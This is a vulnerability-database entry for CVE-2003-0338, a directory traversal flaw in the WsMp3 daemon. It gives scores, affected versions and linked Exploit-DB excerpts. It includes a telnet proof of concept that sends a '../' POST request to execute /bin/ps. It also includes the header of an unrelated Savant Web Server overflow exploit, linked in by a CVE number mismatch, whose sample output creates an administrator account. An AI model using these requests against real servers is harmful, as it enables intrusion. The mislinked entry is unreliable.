CVE-2003-0338
published 2003-05-21CVE-2003-0338: Directory traversal vulnerability in WsMp3 daemon (WsMp3d) 0.0.10 and earlier allows remote attackers to read and execute arbitrary files via .. (dot dot)…
PriorityP429medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.03%
85.8th percentile
Directory traversal vulnerability in WsMp3 daemon (WsMp3d) 0.0.10 and earlier allows remote attackers to read and execute arbitrary files via .. (dot dot) sequences in HTTP GET or POST requests.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wsmp3 | wsmp3_daemon | — | — |
| wsmp3 | wsmp3_daemon | — | — |
| wsmp3 | wsmp3_daemon | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
| wsmp3 | wsmp3_web_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
exploitdb·2005-02-04
CVE-2005-0338 Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
---
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-
#-=[ ]=-
#-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke #
##################################################################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit #
# #
#This is exploit sending the
Exploit-DB
WSMP3 0.0.x - Remote Command Execution
exploitdb·2003-05-21
CVE-2003-0338 WSMP3 0.0.x - Remote Command Execution
WSMP3 0.0.x - Remote Command Execution
---
source: https://www.securityfocus.com/bid/7645/info
A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system.
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
No writeups or analysis indexed.
2003-05-21
Published